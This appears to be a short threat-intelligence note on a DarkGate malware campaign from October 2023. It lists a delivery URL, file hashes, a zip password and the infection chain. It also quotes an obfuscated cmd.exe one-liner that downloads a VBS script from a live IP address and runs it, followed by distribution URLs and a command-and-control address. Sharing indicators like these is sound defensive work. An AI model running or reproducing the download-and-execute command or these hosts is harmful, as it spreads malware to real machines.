01.10.2023 | Darkgate | 

*************************************************

.url https://yellowstone.com.mm/rahu/
.zip dc7e093daf79662126d4abeb759551a92a87ac73baa63e55e185c7eeaacd6347 pw = 678
.vbs 1d7053102899df457b96b56671ac70ab69817bc1e97b96d42634a772d0d65995

*************************************************

zip > lnk > vbs > au3 > exe

cmd /c C:\Users\Admin\AppData\Local\Temp\MFGT.pdf.lnk

cmd.exe /c fjw || eChO fjw & PI"Ng" fjw || CuR"l" h"t"tp"://"136".2"4"4"."9"2."148"/r"dFR"2/Gb"B" -o C:\Users\Admin\AppData\Local\Temp\fjw.vbs & PI"Ng" -n 4 fjw || c"sc"r"I"P"t" C:\Users\Admin\AppData\Local\Temp\fjw.vbs & ex"i"T 'JHtjiktvgJhgaZg

PI"Ng" fjw 

CuR"l" h"t"tp"://"136".2"4"4"."9"2."148"/r"dFR"2/Gb"B" -o C:\Users\Admin\AppData\Local\Temp\fjw.vbs 

PI"Ng" -n 4 fjw 

c"sc"r"I"P"t" C:\Users\Admin\AppData\Local\Temp\fjw.vbs 


*************************************************

distro urls

http://95.179.164.94/fep4R/Jm
http://136.244.92.148/rdFR2/GbB

*************************************************

c2'

http://81.19.135.17:2351 
